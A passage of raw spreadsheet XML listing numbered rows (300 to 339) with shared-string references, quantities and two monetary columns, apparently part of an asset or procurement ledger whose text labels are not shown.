      <c r="F305" s="9"/>
      <c r="G305" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H305" s="11">
        <v>1</v>
      </c>
      <c r="I305" s="238" t="s">
        <v>776</v>
      </c>
      <c r="J305" s="126">
        <v>156752.14</v>
      </c>
      <c r="K305" s="99">
        <v>60172.8</v>
      </c>
      <c r="L305" s="238" t="s">
        <v>3506</v>
      </c>
    </row>
    <row r="306" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A306" s="93"/>
      <c r="B306" s="88">
        <v>300</v>
      </c>
      <c r="C306" s="237" t="s">
        <v>3507</v>
      </c>
      <c r="D306" s="238" t="s">
        <v>3419</v>
      </c>
      <c r="E306" s="238" t="s">
        <v>3508</v>
      </c>
      <c r="F306" s="9"/>
      <c r="G306" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H306" s="11">
        <v>1</v>
      </c>
      <c r="I306" s="238" t="s">
        <v>776</v>
      </c>
      <c r="J306" s="126">
        <v>323504.27</v>
      </c>
      <c r="K306" s="99">
        <v>67288</v>
      </c>
      <c r="L306" s="238" t="s">
        <v>3509</v>
      </c>
    </row>
    <row r="307" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A307" s="93"/>
      <c r="B307" s="88">
        <v>301</v>
      </c>
      <c r="C307" s="237" t="s">
        <v>3510</v>
      </c>
      <c r="D307" s="238" t="s">
        <v>3511</v>
      </c>
      <c r="E307" s="238" t="s">
        <v>3512</v>
      </c>
      <c r="F307" s="9"/>
      <c r="G307" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H307" s="11">
        <v>1</v>
      </c>
      <c r="I307" s="238" t="s">
        <v>776</v>
      </c>
      <c r="J307" s="126">
        <v>1502496.31</v>
      </c>
      <c r="K307" s="99">
        <v>576921.6</v>
      </c>
      <c r="L307" s="238" t="s">
        <v>3513</v>
      </c>
    </row>
    <row r="308" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A308" s="93"/>
      <c r="B308" s="88">
        <v>302</v>
      </c>
      <c r="C308" s="237" t="s">
        <v>3514</v>
      </c>
      <c r="D308" s="238" t="s">
        <v>3515</v>
      </c>
      <c r="E308" s="238" t="s">
        <v>3516</v>
      </c>
      <c r="F308" s="9"/>
      <c r="G308" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H308" s="11">
        <v>1</v>
      </c>
      <c r="I308" s="238" t="s">
        <v>3517</v>
      </c>
      <c r="J308" s="126">
        <v>719410.56</v>
      </c>
      <c r="K308" s="99">
        <v>276249.6</v>
      </c>
      <c r="L308" s="238" t="s">
        <v>3518</v>
      </c>
    </row>
    <row r="309" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A309" s="93"/>
      <c r="B309" s="88">
        <v>303</v>
      </c>
      <c r="C309" s="237" t="s">
        <v>3519</v>
      </c>
      <c r="D309" s="238" t="s">
        <v>3520</v>
      </c>
      <c r="E309" s="238" t="s">
        <v>294</v>
      </c>
      <c r="F309" s="9"/>
      <c r="G309" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H309" s="11">
        <v>1</v>
      </c>
      <c r="I309" s="238" t="s">
        <v>3085</v>
      </c>
      <c r="J309" s="126">
        <v>128205.12</v>
      </c>
      <c r="K309" s="99">
        <v>49228.8</v>
      </c>
      <c r="L309" s="238" t="s">
        <v>3521</v>
      </c>
    </row>
    <row r="310" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A310" s="93"/>
      <c r="B310" s="88">
        <v>304</v>
      </c>
      <c r="C310" s="237" t="s">
        <v>3522</v>
      </c>
      <c r="D310" s="238" t="s">
        <v>3523</v>
      </c>
      <c r="E310" s="238" t="s">
        <v>3524</v>
      </c>
      <c r="F310" s="9"/>
      <c r="G310" s="88" t="s">
        <v>3256</v>
      </c>
      <c r="H310" s="11">
        <v>1</v>
      </c>
      <c r="I310" s="238" t="s">
        <v>3525</v>
      </c>
      <c r="J310" s="126">
        <v>128205.13</v>
      </c>
      <c r="K310" s="99">
        <v>35896</v>
      </c>
      <c r="L310" s="238" t="s">
        <v>3526</v>
      </c>
    </row>
    <row r="311" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A311" s="93"/>
      <c r="B311" s="88">
        <v>305</v>
      </c>
      <c r="C311" s="237" t="s">
        <v>3527</v>
      </c>
      <c r="D311" s="238" t="s">
        <v>1273</v>
      </c>
      <c r="E311" s="238" t="s">
        <v>3528</v>
      </c>
      <c r="F311" s="9"/>
      <c r="G311" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H311" s="11">
        <v>1</v>
      </c>
      <c r="I311" s="238" t="s">
        <v>3529</v>
      </c>
      <c r="J311" s="126">
        <v>52991.45</v>
      </c>
      <c r="K311" s="99">
        <v>14812</v>
      </c>
      <c r="L311" s="238" t="s">
        <v>3086</v>
      </c>
    </row>
    <row r="312" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A312" s="93"/>
      <c r="B312" s="88">
        <v>306</v>
      </c>
      <c r="C312" s="237" t="s">
        <v>3530</v>
      </c>
      <c r="D312" s="238" t="s">
        <v>1324</v>
      </c>
      <c r="E312" s="238" t="s">
        <v>3531</v>
      </c>
      <c r="F312" s="9"/>
      <c r="G312" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H312" s="11">
        <v>2</v>
      </c>
      <c r="I312" s="238" t="s">
        <v>3532</v>
      </c>
      <c r="J312" s="126">
        <v>19829.06</v>
      </c>
      <c r="K312" s="99">
        <v>5544</v>
      </c>
      <c r="L312" s="238" t="s">
        <v>3533</v>
      </c>
    </row>
    <row r="313" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A313" s="93"/>
      <c r="B313" s="88">
        <v>307</v>
      </c>
      <c r="C313" s="237" t="s">
        <v>3534</v>
      </c>
      <c r="D313" s="238" t="s">
        <v>1374</v>
      </c>
      <c r="E313" s="238" t="s">
        <v>3535</v>
      </c>
      <c r="F313" s="9"/>
      <c r="G313" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H313" s="11">
        <v>1</v>
      </c>
      <c r="I313" s="238" t="s">
        <v>3532</v>
      </c>
      <c r="J313" s="126">
        <v>13675.21</v>
      </c>
      <c r="K313" s="99">
        <v>0</v>
      </c>
      <c r="L313" s="238" t="s">
        <v>3536</v>
      </c>
    </row>
    <row r="314" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A314" s="93"/>
      <c r="B314" s="88">
        <v>308</v>
      </c>
      <c r="C314" s="237" t="s">
        <v>3537</v>
      </c>
      <c r="D314" s="238" t="s">
        <v>1152</v>
      </c>
      <c r="E314" s="238" t="s">
        <v>3538</v>
      </c>
      <c r="F314" s="9"/>
      <c r="G314" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H314" s="11">
        <v>1</v>
      </c>
      <c r="I314" s="238" t="s">
        <v>1008</v>
      </c>
      <c r="J314" s="126">
        <v>25641.03</v>
      </c>
      <c r="K314" s="99">
        <v>0</v>
      </c>
      <c r="L314" s="238" t="s">
        <v>3539</v>
      </c>
    </row>
    <row r="315" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A315" s="93"/>
      <c r="B315" s="88">
        <v>309</v>
      </c>
      <c r="C315" s="237" t="s">
        <v>3540</v>
      </c>
      <c r="D315" s="238" t="s">
        <v>548</v>
      </c>
      <c r="E315" s="238" t="s">
        <v>3531</v>
      </c>
      <c r="F315" s="9"/>
      <c r="G315" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H315" s="11">
        <v>2</v>
      </c>
      <c r="I315" s="238" t="s">
        <v>3541</v>
      </c>
      <c r="J315" s="126">
        <v>19829.06</v>
      </c>
      <c r="K315" s="99">
        <v>5544</v>
      </c>
      <c r="L315" s="238" t="s">
        <v>3542</v>
      </c>
    </row>
    <row r="316" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A316" s="93"/>
      <c r="B316" s="88">
        <v>310</v>
      </c>
      <c r="C316" s="237" t="s">
        <v>3543</v>
      </c>
      <c r="D316" s="238" t="s">
        <v>3544</v>
      </c>
      <c r="E316" s="10"/>
      <c r="F316" s="9"/>
      <c r="G316" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H316" s="11">
        <v>10</v>
      </c>
      <c r="I316" s="238" t="s">
        <v>437</v>
      </c>
      <c r="J316" s="126">
        <v>2980717.93</v>
      </c>
      <c r="K316" s="99">
        <v>1144320</v>
      </c>
      <c r="L316" s="238" t="s">
        <v>3545</v>
      </c>
    </row>
    <row r="317" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A317" s="93"/>
      <c r="B317" s="88">
        <v>311</v>
      </c>
      <c r="C317" s="237" t="s">
        <v>3546</v>
      </c>
      <c r="D317" s="238" t="s">
        <v>3547</v>
      </c>
      <c r="E317" s="238" t="s">
        <v>3548</v>
      </c>
      <c r="F317" s="9"/>
      <c r="G317" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H317" s="11">
        <v>2</v>
      </c>
      <c r="I317" s="238" t="s">
        <v>437</v>
      </c>
      <c r="J317" s="126">
        <v>598290.6</v>
      </c>
      <c r="K317" s="99">
        <v>0</v>
      </c>
      <c r="L317" s="238" t="s">
        <v>3545</v>
      </c>
    </row>
    <row r="318" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A318" s="93"/>
      <c r="B318" s="88">
        <v>312</v>
      </c>
      <c r="C318" s="237" t="s">
        <v>3549</v>
      </c>
      <c r="D318" s="238" t="s">
        <v>3550</v>
      </c>
      <c r="E318" s="238" t="s">
        <v>3551</v>
      </c>
      <c r="F318" s="9"/>
      <c r="G318" s="88" t="s">
        <v>1697</v>
      </c>
      <c r="H318" s="11">
        <v>1</v>
      </c>
      <c r="I318" s="238" t="s">
        <v>437</v>
      </c>
      <c r="J318" s="126">
        <v>290000</v>
      </c>
      <c r="K318" s="99">
        <v>120640</v>
      </c>
      <c r="L318" s="238" t="s">
        <v>3552</v>
      </c>
    </row>
    <row r="319" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A319" s="93"/>
      <c r="B319" s="88">
        <v>313</v>
      </c>
      <c r="C319" s="237" t="s">
        <v>3553</v>
      </c>
      <c r="D319" s="238" t="s">
        <v>3554</v>
      </c>
      <c r="E319" s="10"/>
      <c r="F319" s="9"/>
      <c r="G319" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H319" s="11">
        <v>1</v>
      </c>
      <c r="I319" s="238" t="s">
        <v>3555</v>
      </c>
      <c r="J319" s="126">
        <v>2704889.75</v>
      </c>
      <c r="K319" s="99">
        <v>757344</v>
      </c>
      <c r="L319" s="238" t="s">
        <v>3556</v>
      </c>
    </row>
    <row r="320" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A320" s="93"/>
      <c r="B320" s="88">
        <v>314</v>
      </c>
      <c r="C320" s="237" t="s">
        <v>3557</v>
      </c>
      <c r="D320" s="238" t="s">
        <v>3429</v>
      </c>
      <c r="E320" s="238" t="s">
        <v>3558</v>
      </c>
      <c r="F320" s="9"/>
      <c r="G320" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H320" s="11">
        <v>1</v>
      </c>
      <c r="I320" s="238" t="s">
        <v>3559</v>
      </c>
      <c r="J320" s="126">
        <v>6410.26</v>
      </c>
      <c r="K320" s="99">
        <v>2150.4</v>
      </c>
      <c r="L320" s="238" t="s">
        <v>3560</v>
      </c>
    </row>
    <row r="321" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A321" s="93"/>
      <c r="B321" s="88">
        <v>315</v>
      </c>
      <c r="C321" s="237" t="s">
        <v>3561</v>
      </c>
      <c r="D321" s="238" t="s">
        <v>3562</v>
      </c>
      <c r="E321" s="238" t="s">
        <v>3563</v>
      </c>
      <c r="F321" s="9"/>
      <c r="G321" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H321" s="11">
        <v>1</v>
      </c>
      <c r="I321" s="238" t="s">
        <v>1557</v>
      </c>
      <c r="J321" s="126">
        <v>22222.22</v>
      </c>
      <c r="K321" s="99">
        <v>9235.2</v>
      </c>
      <c r="L321" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="322" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A322" s="93"/>
      <c r="B322" s="88">
        <v>316</v>
      </c>
      <c r="C322" s="237" t="s">
        <v>3564</v>
      </c>
      <c r="D322" s="238" t="s">
        <v>3565</v>
      </c>
      <c r="E322" s="238" t="s">
        <v>537</v>
      </c>
      <c r="F322" s="9"/>
      <c r="G322" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H322" s="11">
        <v>1</v>
      </c>
      <c r="I322" s="238" t="s">
        <v>3566</v>
      </c>
      <c r="J322" s="126">
        <v>72649.57</v>
      </c>
      <c r="K322" s="99">
        <v>30201.6</v>
      </c>
      <c r="L322" s="238" t="s">
        <v>3567</v>
      </c>
    </row>
    <row r="323" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A323" s="93"/>
      <c r="B323" s="88">
        <v>317</v>
      </c>
      <c r="C323" s="237" t="s">
        <v>3568</v>
      </c>
      <c r="D323" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E323" s="238" t="s">
        <v>1409</v>
      </c>
      <c r="F323" s="9"/>
      <c r="G323" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H323" s="11">
        <v>6</v>
      </c>
      <c r="I323" s="238" t="s">
        <v>3566</v>
      </c>
      <c r="J323" s="126">
        <v>92307.69</v>
      </c>
      <c r="K323" s="99">
        <v>0</v>
      </c>
      <c r="L323" s="238" t="s">
        <v>3567</v>
      </c>
    </row>
    <row r="324" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A324" s="93"/>
      <c r="B324" s="88">
        <v>318</v>
      </c>
      <c r="C324" s="237" t="s">
        <v>3569</v>
      </c>
      <c r="D324" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E324" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F324" s="9"/>
      <c r="G324" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H324" s="11">
        <v>8</v>
      </c>
      <c r="I324" s="238" t="s">
        <v>3566</v>
      </c>
      <c r="J324" s="126">
        <v>116239.32</v>
      </c>
      <c r="K324" s="99">
        <v>0</v>
      </c>
      <c r="L324" s="238" t="s">
        <v>3567</v>
      </c>
    </row>
    <row r="325" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A325" s="93"/>
      <c r="B325" s="88">
        <v>319</v>
      </c>
      <c r="C325" s="237" t="s">
        <v>3570</v>
      </c>
      <c r="D325" s="238" t="s">
        <v>3571</v>
      </c>
      <c r="E325" s="238" t="s">
        <v>1452</v>
      </c>
      <c r="F325" s="9"/>
      <c r="G325" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H325" s="11">
        <v>6</v>
      </c>
      <c r="I325" s="238" t="s">
        <v>3566</v>
      </c>
      <c r="J325" s="126">
        <v>29059.83</v>
      </c>
      <c r="K325" s="99">
        <v>0</v>
      </c>
      <c r="L325" s="238" t="s">
        <v>3567</v>
      </c>
    </row>
    <row r="326" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A326" s="93"/>
      <c r="B326" s="88">
        <v>320</v>
      </c>
      <c r="C326" s="237" t="s">
        <v>3572</v>
      </c>
      <c r="D326" s="238" t="s">
        <v>1478</v>
      </c>
      <c r="E326" s="238" t="s">
        <v>3573</v>
      </c>
      <c r="F326" s="9"/>
      <c r="G326" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H326" s="11">
        <v>4</v>
      </c>
      <c r="I326" s="238" t="s">
        <v>3566</v>
      </c>
      <c r="J326" s="126">
        <v>61538.46</v>
      </c>
      <c r="K326" s="99">
        <v>0</v>
      </c>
      <c r="L326" s="238" t="s">
        <v>3567</v>
      </c>
    </row>
    <row r="327" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A327" s="93"/>
      <c r="B327" s="88">
        <v>321</v>
      </c>
      <c r="C327" s="237" t="s">
        <v>3574</v>
      </c>
      <c r="D327" s="238" t="s">
        <v>3511</v>
      </c>
      <c r="E327" s="238" t="s">
        <v>3512</v>
      </c>
      <c r="F327" s="9"/>
      <c r="G327" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H327" s="11">
        <v>1</v>
      </c>
      <c r="I327" s="238" t="s">
        <v>3566</v>
      </c>
      <c r="J327" s="126">
        <v>972313.09</v>
      </c>
      <c r="K327" s="99">
        <v>404476.8</v>
      </c>
      <c r="L327" s="238" t="s">
        <v>3575</v>
      </c>
    </row>
    <row r="328" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A328" s="93"/>
      <c r="B328" s="88">
        <v>322</v>
      </c>
      <c r="C328" s="237" t="s">
        <v>3576</v>
      </c>
      <c r="D328" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E328" s="10"/>
      <c r="F328" s="9"/>
      <c r="G328" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H328" s="11">
        <v>1</v>
      </c>
      <c r="I328" s="238" t="s">
        <v>3566</v>
      </c>
      <c r="J328" s="126">
        <v>9401.71</v>
      </c>
      <c r="K328" s="99">
        <v>0</v>
      </c>
      <c r="L328" s="238" t="s">
        <v>3575</v>
      </c>
    </row>
    <row r="329" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A329" s="93"/>
      <c r="B329" s="88">
        <v>323</v>
      </c>
      <c r="C329" s="237" t="s">
        <v>3577</v>
      </c>
      <c r="D329" s="238" t="s">
        <v>3578</v>
      </c>
      <c r="E329" s="238" t="s">
        <v>3579</v>
      </c>
      <c r="F329" s="9"/>
      <c r="G329" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H329" s="11">
        <v>1</v>
      </c>
      <c r="I329" s="238" t="s">
        <v>3566</v>
      </c>
      <c r="J329" s="126">
        <v>58974.36</v>
      </c>
      <c r="K329" s="99">
        <v>24502.4</v>
      </c>
      <c r="L329" s="238" t="s">
        <v>3575</v>
      </c>
    </row>
    <row r="330" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A330" s="93"/>
      <c r="B330" s="88">
        <v>324</v>
      </c>
      <c r="C330" s="237" t="s">
        <v>3580</v>
      </c>
      <c r="D330" s="238" t="s">
        <v>3415</v>
      </c>
      <c r="E330" s="238" t="s">
        <v>3581</v>
      </c>
      <c r="F330" s="9"/>
      <c r="G330" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H330" s="11">
        <v>2</v>
      </c>
      <c r="I330" s="238" t="s">
        <v>3582</v>
      </c>
      <c r="J330" s="126">
        <v>1776351.13</v>
      </c>
      <c r="K330" s="99">
        <v>596836.8</v>
      </c>
      <c r="L330" s="238" t="s">
        <v>3583</v>
      </c>
    </row>
    <row r="331" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A331" s="93"/>
      <c r="B331" s="88">
        <v>325</v>
      </c>
      <c r="C331" s="237" t="s">
        <v>3584</v>
      </c>
      <c r="D331" s="238" t="s">
        <v>840</v>
      </c>
      <c r="E331" s="10"/>
      <c r="F331" s="9"/>
      <c r="G331" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H331" s="11">
        <v>1</v>
      </c>
      <c r="I331" s="238" t="s">
        <v>3566</v>
      </c>
      <c r="J331" s="126">
        <v>29914.53</v>
      </c>
      <c r="K331" s="99">
        <v>12438.4</v>
      </c>
      <c r="L331" s="238" t="s">
        <v>3575</v>
      </c>
    </row>
    <row r="332" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A332" s="93"/>
      <c r="B332" s="88">
        <v>326</v>
      </c>
      <c r="C332" s="237" t="s">
        <v>3585</v>
      </c>
      <c r="D332" s="238" t="s">
        <v>3586</v>
      </c>
      <c r="E332" s="238" t="s">
        <v>3587</v>
      </c>
      <c r="F332" s="9"/>
      <c r="G332" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H332" s="11">
        <v>1</v>
      </c>
      <c r="I332" s="238" t="s">
        <v>1192</v>
      </c>
      <c r="J332" s="126">
        <v>324786.32</v>
      </c>
      <c r="K332" s="99">
        <v>135075.2</v>
      </c>
      <c r="L332" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="333" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A333" s="93"/>
      <c r="B333" s="88">
        <v>327</v>
      </c>
      <c r="C333" s="237" t="s">
        <v>3588</v>
      </c>
      <c r="D333" s="238" t="s">
        <v>3589</v>
      </c>
      <c r="E333" s="238" t="s">
        <v>3590</v>
      </c>
      <c r="F333" s="9"/>
      <c r="G333" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H333" s="11">
        <v>1</v>
      </c>
      <c r="I333" s="238" t="s">
        <v>1195</v>
      </c>
      <c r="J333" s="126">
        <v>21196.58</v>
      </c>
      <c r="K333" s="99">
        <v>8777.6</v>
      </c>
      <c r="L333" s="238" t="s">
        <v>3591</v>
      </c>
    </row>
    <row r="334" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A334" s="93"/>
      <c r="B334" s="88">
        <v>328</v>
      </c>
      <c r="C334" s="237" t="s">
        <v>3592</v>
      </c>
      <c r="D334" s="238" t="s">
        <v>1412</v>
      </c>
      <c r="E334" s="238" t="s">
        <v>3593</v>
      </c>
      <c r="F334" s="9"/>
      <c r="G334" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H334" s="11">
        <v>1</v>
      </c>
      <c r="I334" s="238" t="s">
        <v>3594</v>
      </c>
      <c r="J334" s="126">
        <v>77307.69</v>
      </c>
      <c r="K334" s="99">
        <v>0</v>
      </c>
      <c r="L334" s="238" t="s">
        <v>3595</v>
      </c>
    </row>
    <row r="335" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A335" s="93"/>
      <c r="B335" s="88">
        <v>329</v>
      </c>
      <c r="C335" s="237" t="s">
        <v>3596</v>
      </c>
      <c r="D335" s="238" t="s">
        <v>3597</v>
      </c>
      <c r="E335" s="238" t="s">
        <v>3598</v>
      </c>
      <c r="F335" s="9"/>
      <c r="G335" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H335" s="11">
        <v>24</v>
      </c>
      <c r="I335" s="238" t="s">
        <v>3599</v>
      </c>
      <c r="J335" s="126">
        <v>8205.13</v>
      </c>
      <c r="K335" s="99">
        <v>2296</v>
      </c>
      <c r="L335" s="238" t="s">
        <v>3600</v>
      </c>
    </row>
    <row r="336" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A336" s="93"/>
      <c r="B336" s="88">
        <v>330</v>
      </c>
      <c r="C336" s="237" t="s">
        <v>3601</v>
      </c>
      <c r="D336" s="238" t="s">
        <v>1287</v>
      </c>
      <c r="E336" s="238" t="s">
        <v>3602</v>
      </c>
      <c r="F336" s="9"/>
      <c r="G336" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H336" s="11">
        <v>2</v>
      </c>
      <c r="I336" s="238" t="s">
        <v>3603</v>
      </c>
      <c r="J336" s="126">
        <v>16239.32</v>
      </c>
      <c r="K336" s="99">
        <v>5961.6</v>
      </c>
      <c r="L336" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="337" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A337" s="93"/>
      <c r="B337" s="88">
        <v>331</v>
      </c>
      <c r="C337" s="237" t="s">
        <v>3604</v>
      </c>
      <c r="D337" s="238" t="s">
        <v>3605</v>
      </c>
      <c r="E337" s="10"/>
      <c r="F337" s="9"/>
      <c r="G337" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H337" s="11">
        <v>9</v>
      </c>
      <c r="I337" s="238" t="s">
        <v>3606</v>
      </c>
      <c r="J337" s="126">
        <v>75000</v>
      </c>
      <c r="K337" s="99">
        <v>3360</v>
      </c>
      <c r="L337" s="238" t="s">
        <v>3521</v>
      </c>
    </row>
    <row r="338" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A338" s="93"/>
      <c r="B338" s="88">
        <v>332</v>
      </c>
      <c r="C338" s="237" t="s">
        <v>3607</v>
      </c>
      <c r="D338" s="238" t="s">
        <v>3608</v>
      </c>
      <c r="E338" s="238" t="s">
        <v>3609</v>
      </c>
      <c r="F338" s="9"/>
      <c r="G338" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H338" s="11">
        <v>1</v>
      </c>
      <c r="I338" s="238" t="s">
        <v>3610</v>
      </c>
      <c r="J338" s="126">
        <v>492906</v>
      </c>
      <c r="K338" s="99">
        <v>228705.6</v>
      </c>
      <c r="L338" s="238" t="s">
        <v>3611</v>
      </c>
    </row>
    <row r="339" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A339" s="93"/>
      <c r="B339" s="88">
        <v>333</v>
      </c>
      <c r="C339" s="237" t="s">
        <v>3612</v>
      </c>
      <c r="D339" s="238" t="s">
        <v>3613</v>
      </c>
      <c r="E339" s="238" t="s">
        <v>282</v>
      </c>
      <c r="F339" s="9"/>
      <c r="G339" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H339" s="11">
        <v>1</v>
      </c>
      <c r="I339" s="238" t="s">
        <v>3610</v>
      </c>
      <c r="J339" s="126">
        <v>117094.02</v>
      </c>
      <c r="K339" s="99">
        <v>52416</v>
      </c>
      <c r="L339" s="238" t="s">
        <v>3614</v>
      </c>
    </row>
    <row r="340" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A340" s="93"/>
      <c r="B340" s="88">
        <v>334</v>
      </c>
      <c r="C340" s="237" t="s">
        <v>3615</v>
      </c>
      <c r="D340" s="238" t="s">
        <v>3482</v>
      </c>
      <c r="E340" s="238" t="s">
        <v>3616</v>
      </c>
      <c r="F340" s="9"/>
      <c r="G340" s="88" t="s">
        <v>3484</v>
      </c>
      <c r="H340" s="11">
        <v>1</v>
      </c>
      <c r="I340" s="238" t="s">
        <v>3610</v>
      </c>
      <c r="J340" s="126">
        <v>136752.14</v>
      </c>
      <c r="K340" s="99">
        <v>61241.6</v>
      </c>
      <c r="L340" s="238" t="s">
        <v>3617</v>
      </c>
    </row>
    <row r="341" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A341" s="93"/>
      <c r="B341" s="88">
        <v>335</v>
      </c>
      <c r="C341" s="237" t="s">
        <v>3618</v>
      </c>
      <c r="D341" s="238" t="s">
        <v>3619</v>
      </c>
      <c r="E341" s="10"/>
      <c r="F341" s="9"/>
      <c r="G341" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H341" s="11">
        <v>2</v>
      </c>
      <c r="I341" s="238" t="s">
        <v>1475</v>
      </c>
      <c r="J341" s="126">
        <v>3641.03</v>
      </c>
      <c r="K341" s="99">
        <v>1411.2</v>
      </c>
      <c r="L341" s="238" t="s">
        <v>3620</v>
      </c>
    </row>
    <row r="342" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A342" s="93"/>
      <c r="B342" s="88">
        <v>336</v>
      </c>
      <c r="C342" s="237" t="s">
        <v>3621</v>
      </c>
      <c r="D342" s="238" t="s">
        <v>3622</v>
      </c>
      <c r="E342" s="238" t="s">
        <v>3623</v>
      </c>
      <c r="F342" s="9"/>
      <c r="G342" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H342" s="11">
        <v>1</v>
      </c>
      <c r="I342" s="238" t="s">
        <v>1475</v>
      </c>
      <c r="J342" s="14">
        <v>641.03</v>
      </c>
      <c r="K342" s="99">
        <v>250.88</v>
      </c>
      <c r="L342" s="238" t="s">
        <v>3620</v>
      </c>
    </row>
    <row r="343" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A343" s="93"/>
      <c r="B343" s="88">
        <v>337</v>
      </c>
      <c r="C343" s="237" t="s">
        <v>3624</v>
      </c>
      <c r="D343" s="238" t="s">
        <v>3625</v>
      </c>
      <c r="E343" s="238" t="s">
        <v>3626</v>
      </c>
      <c r="F343" s="9"/>
      <c r="G343" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H343" s="11">
        <v>1</v>
      </c>
      <c r="I343" s="238" t="s">
        <v>3627</v>
      </c>
      <c r="J343" s="126">
        <v>81196.58</v>
      </c>
      <c r="K343" s="99">
        <v>27898.4</v>
      </c>
      <c r="L343" s="238" t="s">
        <v>3628</v>
      </c>
    </row>
    <row r="344" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A344" s="93"/>
      <c r="B344" s="88">
        <v>338</v>
      </c>
      <c r="C344" s="237" t="s">
        <v>3629</v>
      </c>
      <c r="D344" s="238" t="s">
        <v>3630</v>
      </c>
      <c r="E344" s="238" t="s">
        <v>3631</v>
      </c>
      <c r="F344" s="9"/>
      <c r="G344" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H344" s="11">
        <v>1</v>
      </c>
      <c r="I344" s="238" t="s">
        <v>729</v>
      </c>
      <c r="J344" s="126">
        <v>8974.32</v>
      </c>
      <c r="K344" s="99">
        <v>43432</v>
      </c>
      <c r="L344" s="238" t="s">
        <v>3595</v>
      </c>
    </row>
    <row r="345" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A345" s="93"/>
      <c r="B345" s="88">
        <v>339</v>
      </c>
      <c r="C345" s="237" t="s">
        <v>3632</v>
      </c>
      <c r="D345" s="238" t="s">
        <v>3011</v>
      </c>
      <c r="E345" s="10"/>
      <c r="F345" s="9"/>
      <c r="G345" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H345" s="11">
        <v>2</v>
      </c>
      <c r="I345" s="238" t="s">
        <v>729</v>
      </c>
      <c r="J345" s="126">
        <v>276068.36</v>
      </c>
      <c r="K345" s="99">
        <v>0</v>
      </c>
      <c r="L345" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="346" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A346" s="93"/>
      <c r="B346" s="88">
